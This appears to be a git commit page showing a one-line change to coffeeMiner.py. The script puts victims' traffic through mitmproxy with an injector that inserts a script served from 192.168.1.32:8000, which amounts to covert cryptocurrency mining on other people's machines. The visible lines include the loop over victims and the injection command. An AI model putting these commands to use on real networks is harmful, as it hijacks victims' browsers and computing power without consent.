Browse Source

Merge 28fee47290 into 7a9270e7d8

pull/35/merge
Pedro Reis 6 years ago
committed by GitHub
parent
commit
c2e2ee7f94
No known key found for this signature in database GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions
  1. +1
    -1
      coffeeMiner.py

+ 1
- 1
coffeeMiner.py

@ -25,7 +25,7 @@ for victim in victims:
os.system("xterm -hold -e 'python3 httpServer.py' &")
# start the mitmproxy
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T")
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' --mode transparent")
'''

Loading…
Cancel
Save